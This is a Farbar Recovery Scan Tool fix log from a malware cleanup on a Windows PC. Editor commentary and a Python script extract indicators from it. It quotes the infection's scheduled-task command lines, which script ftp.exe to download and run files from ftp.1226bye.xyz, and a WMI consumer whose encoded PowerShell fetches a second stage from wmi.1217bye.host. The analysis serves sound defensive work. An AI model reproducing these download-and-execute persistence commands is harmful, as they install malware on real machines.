Fix result of Farbar Recovery Scan Tool (x64) Version: 6.02.2019
Ran by seb (08-02-2019 11:15:29) Run:2
Running from C:\Users\seb\Desktop
Loaded Profiles: seb (Available Profiles: seb)
Boot Mode: Safe Mode (with Networking)
==============================================
fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:
HKLM-x32\...\Run: [start] => C:\Windows\SysWOW64\scrobj.dll [173568 2009-07-14] (Microsoft Windows -> Microsoft Corporation) <==== ATTENTION
HKLM-x32\...\RunOnce: [wextract_cleanup1] => rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\seb\AppData\Local\Temp\IXP001.TMP\" <==== ATTENTION
HKLM-x32\...\RunOnce: [wextract_cleanup0] => rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\seb\AppData\Local\Temp\IXP002.TMP\" <==== ATTENTION
HKLM-x32\...\RunOnce: [wextract_cleanup2] => rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\seb\AppData\Local\Temp\IXP003.TMP\" <==== ATTENTION
HKLM-x32\...\RunOnce: [wextract_cleanup3] => rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\seb\AppData\Local\Temp\IXP004.TMP\" <==== ATTENTION
HKLM-x32\...\RunOnce: [wextract_cleanup4] => rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Windows\TEMP\IXP000.TMP\" <==== ATTENTION
HKLM-x32\...\RunOnce: [wextract_cleanup5] => rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\seb\AppData\Local\Temp\IXP005.TMP\" <==== ATTENTION
HKLM-x32\...\RunOnce: [wextract_cleanup6] => rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\seb\AppData\Local\Temp\IXP006.TMP\" <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
GroupPolicy: Restriction - Chrome <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{f389f567-6176-4f2f-ac37-b46e329c11fc} <==== ATTENTION (Restriction - IP)
ProxyServer: [S-1-5-21-538220665-914173731-789976379-1000] => 127.0.0.1:9666
SearchScopes: HKU\S-1-5-21-538220665-914173731-789976379-1000 -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL =
BHO-x32: No Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> No File
BHO-x32: No Name -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> No File
Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - No File
Toolbar: HKU\S-1-5-21-538220665-914173731-789976379-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
FF HKLM-x32\...\Firefox\Extensions: [FFPDFArchitectConverter@pdfarchitect.com] - C:\Program Files (x86)\PDF Architect\FFPDFArchitectExt => not found
FF HKLM-x32\...\Firefox\Extensions: [WSVCU@Wondershare.com] - C:\ProgramData\Wondershare\Video Converter Ultimate\WSVCU@Wondershare.com => not found
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\firefox.cfg [2013-12-30] <==== ATTENTION
S2 moohelp; C:\Program Files (x86)\The Cleaner\mhelper.exe [X]
HKU\S-1-5-21-538220665-914173731-789976379-1000\...\ChromeHTML: -> <==== ATTENTION
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ContextMenuHandlers1: [AimersoftVideoConverterFileOpreation] -> {1AACB93E-AA97-47F1-BD02-8D2AF2815436} => -> No File
ContextMenuHandlers1-x32: [WondershareVideoConverterFileOpreation] -> {FEB746CA-95C2-485F-B386-C30D4E56D22E} => C:\Windows\SysWOW64\WSCM64.dll -> No File
Task: {6447C7DD-5646-495E-A558-59FF5F5631FC} - System32\Tasks\Mysa3 => cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {76247990-5A8F-4AE9-845D-3CC3573BA3FF} - \{2AC8BACC-1B7C-4A52-A929-0E4C58350019} -> Pas de fichier <==== ATTENTION
Task: {80E1B2CE-3A22-462A-AF2D-C4E58616A89C} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {D918B4B5-DD41-4836-A3D8-C2D81540F797} - System32\Tasks\Mysa2 => cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {FD6E9B36-325E-48F3-A0A9-F9CEC2729588} - System32\Tasks\Mysa => cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\":: <==== ATTENTION
WMI:subscription\__TimerInstruction->fuckyoumm2_itimer:: <==== ATTENTION
WMI:subscription\__IntervalTimerInstruction->fuckyoumm2_itimer:: <==== ATTENTION
WMI:subscription\__EventFilter->fuckyoumm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
WMI:subscription\CommandLineEventConsumer->fuckyoumm4::[CommandLineTemplate => cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB (the data entry has 670 more characters).] <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Temp:0B4227B4 [146]
AlternateDataStreams: C:\ProgramData\Temp:5C321E34 [125]
AlternateDataStreams: C:\ProgramData\Temp:CB0AACC9 [150]
AlternateDataStreams: C:\ProgramData\Temp:D5FBE8F9 [256]
StartRegedit:
Windows Registry Editor Version 5.00
[-HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains]
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains]
@=""
[-HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains]
[-HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\P3P]
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains]
@=""
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains]
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\P3P]
EndRegedit:
EmptyTemp:
Hosts:
RemoveProxy:
*****************
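The fixlist above targets two persistence layers. The scheduled tasks Mysa, Mysa2 and Mysa3 script ftp.exe through cmd.exe (a chain of "echo ...>file" redirections followed by "ftp -s:file") to pull files from ftp.1226bye.xyz and then run what was fetched; Mysa2 drops s.dat as c:\windows\debug\item.dat, which is the DLL the Mysa1 task loads with rundll32. The WMI subscription pairs an __EventFilter that polls Win32_PerfFormattedData_PerfOS_System every 10800 seconds (three hours) with a CommandLineEventConsumer that runs a base64-encoded PowerShell command. The Python below is an added example written for this page, not part of the Fixlog and not an FRST feature: it rebuilds the ftp scripts from the task command lines to recover the host, credentials, transferred files and the post-download command, and decodes the -enc prefix as the log prints it (the log itself says 670 more characters were cut off, so only the start of the payload is recoverable). The inputs are copied from the entries above; the function and variable names are the example's own.

```python
"""Added example (editor-written, not part of the FRST Fixlog): extract
indicators from the Mysa* scheduled tasks and the WMI consumer payload
listed in the fixlist. Inputs are copied from the log; the -enc value is
the truncated prefix the log prints, so its decode is a prefix as well."""
import base64
import re

# Scheduled task command lines as printed in the Fixlog.
MYSA_TASKS = {
    "Mysa":  r"cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe",
    "Mysa2": r"cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p",
    "Mysa3": r"cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe",
}

# Truncated -enc argument of the CommandLineEventConsumer, as printed in the Fixlog.
ENC_PREFIX = (
    "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBi"
    "AEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgA"
    "dAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAn"
    "ACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB"
)

ECHO_RE = re.compile(r"^echo (?P<text>.*?)>(?P<append>>?)(?P<file>\S+)$")
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def rebuild_ftp_script(cmdline):
    """Replay the 'echo ...>file' chain the task runs through cmd.exe.
    Returns ({script_file: [lines]}, [remaining commands, in order])."""
    if cmdline.startswith("cmd /c "):
        cmdline = cmdline[len("cmd /c "):]
    scripts, others = {}, []
    for part in (p.strip() for p in cmdline.split("&")):
        m = ECHO_RE.match(part)
        if m is None:
            others.append(part)
            continue
        lines = scripts.setdefault(m["file"], [])
        if not m["append"]:
            lines.clear()  # a single '>' truncates the file
        lines.append(m["text"])
    return scripts, others


def extract_ftp_iocs(cmdline):
    """Interpret the script handed to 'ftp -s:'. ftp.exe reads it as typed
    input, so 'open <host>' is followed by the username and password lines,
    'get <remote> <local>' names each download, and the command that follows
    ftp in the chain is what the task executes once the file has landed."""
    scripts, others = rebuild_ftp_script(cmdline)
    ftp_cmd = next((c for c in others if c.startswith("ftp -s:")), None)
    if ftp_cmd is None:
        return None
    script = scripts.get(ftp_cmd[len("ftp -s:"):], [])
    ioc = {"host": None, "user": None, "password": None,
           "transfers": [], "post_exec": None}
    lines = iter(script)
    for line in lines:
        if line.startswith("open "):
            ioc["host"] = line.split(None, 1)[1]
            ioc["user"] = next(lines, None)
            ioc["password"] = next(lines, None)
        elif line.startswith("get "):
            remote, _, local = line[4:].partition(" ")
            ioc["transfers"].append((remote, local))
    after = others[others.index(ftp_cmd) + 1:]
    if after:
        ioc["post_exec"] = after[0]
    return ioc


def decode_powershell_enc(blob):
    """Decode a PowerShell -EncodedCommand value (base64 over UTF-16LE).
    Truncated input is decoded as far as it goes: an incomplete final base64
    group is padded, a lone dangling character is dropped, and a trailing
    half code unit is discarded."""
    blob = blob.strip()
    rem = len(blob) % 4
    if rem == 1:
        blob = blob[:-1]
    elif rem:
        blob += "=" * (4 - rem)
    raw = base64.b64decode(blob)
    if len(raw) % 2:
        raw = raw[:-1]
    return raw.decode("utf-16-le", errors="replace")


def network_indicators():
    """Hosts contacted by the ftp tasks and by the decoded WMI payload."""
    hosts = set()
    for cmd in MYSA_TASKS.values():
        ioc = extract_ftp_iocs(cmd)
        if ioc and ioc["host"]:
            hosts.add(ioc["host"])
    for url in URL_RE.findall(decode_powershell_enc(ENC_PREFIX)):
        hosts.add(url.split("/")[2])
    return sorted(hosts)


if __name__ == "__main__":
    for name, cmd in MYSA_TASKS.items():
        print(name, extract_ftp_iocs(cmd))
    print(decode_powershell_enc(ENC_PREFIX))
    print(network_indicators())
```

The decoded prefix reads `$wc=New-Object System.Net.WebClient;$wc.DownloadString('http://wmi.1217bye.host/2.txt').trim() -spli`, which is enough to show that the WMI consumer fetches a second stage over HTTP each time the filter fires; the rest of the command is not on this page. The credentials the tasks embed (user "test", password "1433") and the two hostnames are the values worth carrying into blocklists and proxy/DNS log searches.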
Processes closed successfully.
Error: A restore point can only be created in normal mode.
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\start" => not found
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\wextract_cleanup1" => not found
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\wextract_cleanup0" => not found
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\wextract_cleanup2" => not found
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\wextract_cleanup3" => not found
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\wextract_cleanup4" => not found
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\wextract_cleanup5" => not found
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\wextract_cleanup6" => not found
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => not found
"C:\Windows\system32\GroupPolicy\Machine" => not found
"HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\\ActivePolicy" => not found
"HKU\S-1-5-21-538220665-914173731-789976379-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer" => not found
HKU\S-1-5-21-538220665-914173731-789976379-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{d944bb61-2e34-4dbf-a683-47e505c587dc} => not found
HKLM\Software\Classes\CLSID\{d944bb61-2e34-4dbf-a683-47e505c587dc} => not found
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} => not found
HKLM\Software\Wow6432Node\Classes\CLSID\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} => not found
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9} => not found
HKLM\Software\Wow6432Node\Classes\CLSID\{DBC80044-A445-435b-BC74-9C25C1C588A9} => not found
"HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\{CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F}" => not found
HKLM\Software\Classes\CLSID\{CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} => not found
"HKU\S-1-5-21-538220665-914173731-789976379-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F}" => not found
HKLM\Software\Classes\CLSID\{2318C2B1-4965-11D4-9B18-009027A5CD4F} => not found
"HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\FFPDFArchitectConverter@pdfarchitect.com" => not found
"HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\WSVCU@Wondershare.com" => not found
"C:\Program Files (x86)\mozilla firefox\firefox.cfg" => not found
moohelp => service not found.
HKU\S-1-5-21-538220665-914173731-789976379-1000_Classes\ChromeHTML => not found
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00asw => not found
HKLM\Software\Classes\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => not found
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast => not found
HKLM\Software\Classes\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => not found
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\AimersoftVideoConverterFileOpreation => not found
HKLM\Software\Classes\CLSID\{1AACB93E-AA97-47F1-BD02-8D2AF2815436} => not found
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WondershareVideoConverterFileOpreation => not found
HKLM\Software\Wow6432Node\Classes\CLSID\{FEB746CA-95C2-485F-B386-C30D4E56D22E} => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6447C7DD-5646-495E-A558-59FF5F5631FC}" => not found
"C:\Windows\System32\Tasks\Mysa3" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Mysa3" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{76247990-5A8F-4AE9-845D-3CC3573BA3FF}" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{2AC8BACC-1B7C-4A52-A929-0E4C58350019}" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{80E1B2CE-3A22-462A-AF2D-C4E58616A89C}" => not found
"C:\Windows\System32\Tasks\Mysa1" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Mysa1" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D918B4B5-DD41-4836-A3D8-C2D81540F797}" => not found
"C:\Windows\System32\Tasks\Mysa2" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Mysa2" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FD6E9B36-325E-48F3-A0A9-F9CEC2729588}" => not found
"C:\Windows\System32\Tasks\Mysa" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Mysa" => not found
"CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\"" => not found
"fuckyoumm2_itimer" => not found
"fuckyoumm2_itimer" => not found
"fuckyoumm3" => not found
"fuckyoumm4" => not found
"C:\ProgramData\Temp" => ":0B4227B4" ADS not found.
"C:\ProgramData\Temp" => ":5C321E34" ADS not found.
"C:\ProgramData\Temp" => ":CB0AACC9" ADS not found.
"C:\ProgramData\Temp" => ":D5FBE8F9" ADS not found.
====> Registry
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.
========= RemoveProxy: =========
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => removed successfully
"HKU\S-1-5-21-538220665-914173731-789976379-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => removed successfully
"HKU\S-1-5-21-538220665-914173731-789976379-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => removed successfully
========= End of RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 261645 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 0 B
Edge => 0 B
Chrome => 0 B
Firefox => 407315176 B
Opera => 152276 B
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 66228 B
Public => 0 B
ProgramData => 0 B
systemprofile => 200907968 B
systemprofile32 => 20256110 B
LocalService => 26662548 B
NetworkService => 66228 B
seb => 1795058831 B
RecycleBin => 0 B
EmptyTemp: => 2.3 GB temporary data removed.
================================
The system needed a reboot.
==== End of Fixlog 11:27:10 ====